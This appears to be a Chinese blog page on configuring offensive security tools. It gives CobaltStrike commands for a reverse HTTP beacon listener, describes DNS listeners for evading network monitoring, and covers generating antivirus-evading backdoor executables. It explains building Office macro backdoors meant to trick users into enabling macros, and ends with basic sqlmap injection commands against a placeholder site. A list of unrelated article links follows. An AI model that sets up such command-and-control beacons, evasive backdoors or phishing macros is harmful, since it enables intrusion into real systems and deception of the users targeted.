当前位置: 首页 > news >正文

安全工具配置

news 来源:原创 2025/5/21 8:38:25

3.1 工具使用

3.1.1 CobaltStrike 高级用法

监听器(Listener)配置

- HTTP/HTTPS监听器:

# 配置HTTP监听器(默认端口80) set payload windows/beacon_http/reverse_http set Host 192.168.1.10 set Port 80 exploit -j

- DNS监听器:绕过网络监控,通过DNS协议回传数据(需配置域名解析指向C2服务器)。

后门生成与权限维持

- Windows可执行文件:

bash # 生成免杀后门(使用混淆模板) ./agscript.sh <团队服务器> <用户> <密码> artifact-kit/pe_templates_template.x64.exe

- Office宏后门:

1. 生成宏Payload:Attacks → Packages → Microsoft Office Macro。

2. 插入Word文档,诱导用户启用宏触发上线。

3.1.2 Sqlmap 自动化注入实战

基础命令

# 检测目标是否存在注入  

sqlmap -u "http://target.com/page?id=1" --batch

# 获取数据库名称  

sqlmap -u "http://target.com/page?id=1" --dbs

相关文章:

  • STM32外设应用详解——从基础到高级应用的全面指南
  • 基于NLP技术的客户投诉与需求文本分类方法研究
  • 大语言模型的评估指标
  • 差动讯号(2):奇模与偶模
  • RedissonClient主要功能概述
  • 公路水运安全员C证用途及重要性
  • MySQL:to many connections连接数过多
  • 【数据结构 -- AVL树】用golang实现AVL树
  • 商标撤三要求越来越高,一些注意!
  • 73.矩阵置零
  • 云原生架构下的企业 DevOps 治理实践:挑战、策略与落地路径
  • Git Hooks 和 自动生成 Commit Message
  • mysql的乐观锁与悲观锁
  • VUE3 中的 ResizeObserver 警告彻底解决方案
  • Mysql 中的日期时间函数汇总
  • 喷涂喷漆机器人详解
  • Translational Psychiatry | 注意缺陷多动障碍儿童延迟厌恶的行为与神经功能特征茗创科技茗创科技
  • 互联网大厂面试实录:从内容社区到AIGC的Java全栈技术场景问答
  • 【华为OD-B卷-打印文件 100分(python、java、c++、js、c)】
  • 码钉枪行业2025数据分析报告
  • 这群“工博士”,把论文“写”在车间里
  • 春决火爆的背后,PEL如何做大这块电竞蛋糕
  • “80后”湖南岳阳临湘市市长刘琦任临湘市委书记
  • 林园:茅台一直是稀缺资源,股东比较有信仰,依旧看好白酒市场
  • 贵州茅台股东大会回应八大热点:确保茅台酒价格体系稳固,相信自我调节能力
  • 完善劳动关系协商协调机制,《共同保障劳动者合法权益工作指引》发布